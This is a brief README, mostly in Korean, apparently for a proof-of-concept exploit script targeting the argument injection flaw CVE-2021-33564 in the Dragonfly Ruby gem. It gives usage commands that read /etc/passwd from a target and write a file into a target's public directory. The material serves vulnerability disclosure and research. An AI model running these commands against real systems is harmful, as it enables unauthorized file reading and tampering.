
Argument Injection in Dragonfly Ruby Gem
Dragonfly Ruby Gem의 인자 주입 취약점(CVE-2021-33564)을 위한 익스플로잇 스크립트.
python3 poc.py -u https://<target_url>/system/refinery/images -r /etc/passwd
python3 poc.py -u https://<target_url>/system/refinery/images -w public/test.txt -c test.txt -lu http://<local_url>
자세한 내용은 블로그를 방문해 주세요.